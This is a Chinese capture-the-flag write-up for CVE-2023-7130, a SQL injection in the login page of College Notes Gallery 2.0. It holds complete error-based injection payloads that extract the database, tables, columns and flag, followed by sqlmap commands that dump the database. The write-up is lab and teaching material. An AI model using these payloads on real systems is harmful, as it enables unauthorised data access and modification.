春秋云境CVE-2023-7130

发布于:2024-03-29 ⋅ 阅读:(14) ⋅ 点赞:(0)

简介

College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.

正文

这关有我用了两种办法,第一种是用报错注入进行手注,第二种就是sqlmap

首先进入靶场我们就可以看到有个login登录的按键,直接点进去。

第一种,报错注入

进入登录界面那就直接开始测试,我们进来就看到这里有个报错,那么就很明显的知道这里可以用报错注入。那么就开始测闭合,发现是单引号闭合。

爆数据库名

1'+and+(extractvalue(1,concat(0x7e,(select+database()),0x7e)))=1--+

爆表名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(table_name)from+information_schema.tables+where+table_schema='notes'),0x7e)))=1--+

爆列名

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(column_name)from+information_schema.columns+where+table_schema='notes'+and+table_name='flllaaaag'),0x7e)))=1--+

爆内容

1'+and+(extractvalue(1,concat(0x7e,(select+group_concat(flag)from+flllaaaag),0x7e)))=1--+

注意

这里因为报错注入输出是有限制长度的,所以我们需要用截断函数来把后面的的内容显示出来。

1'+and+(extractvalue(1,concat(0x7e,substr((select+group_concat(flag)from+flllaaaag),20,40),0x7e)))=1--+

第二种方式sqlmap

爆库名

python sqlmap.py -r 2.txt -batch -dbs

爆表名

python sqlmap.py -r 2.txt -batch -D notes -tables

爆列名

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -columns

爆数据

python sqlmap.py -r 2.txt -batch -D notes -T flllaaaag -C flag -dump

本文含有隐藏内容,请 开通VIP 后查看